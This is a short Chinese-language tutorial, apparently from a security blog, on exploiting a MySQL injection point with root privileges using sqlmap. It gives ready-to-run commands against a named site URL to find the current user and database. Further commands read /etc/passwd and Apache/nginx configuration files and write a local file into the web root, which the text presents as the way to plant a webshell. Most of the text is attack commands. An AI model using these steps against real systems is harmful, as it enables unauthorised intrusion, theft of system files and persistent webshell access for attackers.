遇到一mysql root权限注入点,尝试用sqlmap进一步渗透获取更高权限,具体如下:
判断注入点的当前用户和当前数据库
./sqlmap.py -u "http://www.nxadmin.com/sql-injection.php?id=1" --current-user
./sqlmap.py -u "http://www.nxadmin.com/sql-injection.php?id=1" --current-db
root权限注入点可以尝试读取系统文件,比如/etc/passwd,以及apache,nginx的配置文件等,相关配置文件路径如下:
nginx: usr/local/nginx/conf/nginx.conf
常用的apache配置文件路径有:
/etc/httpd/conf/httpd.conf
/usr/local/apache/conf/httpd.conf
/usr/local/apache2/conf/httpd.conf
sqlmap读取文件语法:
./sqlmap.py -u "http://www.nxadmin.com/sql-injection.php?id=1" --file-read "/etc/passwd"
如果magic_quotes_gpc=off就可以尝试进行写入Webshell,sqlmap写入文件语法:
./sqlmap.py -u "http://www.nxadmin.com/sql-injection.php?id=1" –file-write /test/test.txt –file-dest /var/www/html/1.txt
将本地的test.txt写入到站点服务器的html目录下。